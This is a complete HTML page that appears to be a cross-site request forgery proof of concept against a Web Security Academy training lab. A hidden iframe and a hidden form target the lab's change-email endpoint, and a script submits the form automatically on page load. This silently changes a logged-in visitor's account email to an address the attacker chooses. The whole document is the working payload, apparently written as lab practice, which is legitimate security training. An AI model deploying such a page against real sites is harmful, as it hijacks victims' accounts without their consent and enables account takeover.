<html>
    <body>
        <h1>Hello World!</h1>
        <iframe style="display:none" name="csrf-iframe"></iframe>
        <form action="https://0a1a007704b922c7c0d5279300640010.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
            <input type="hidden" name="email" value="smmmm@test.ca">
        </form>

        <script>document.getElementById("csrf-form").submit()</script>
    </body>
</html>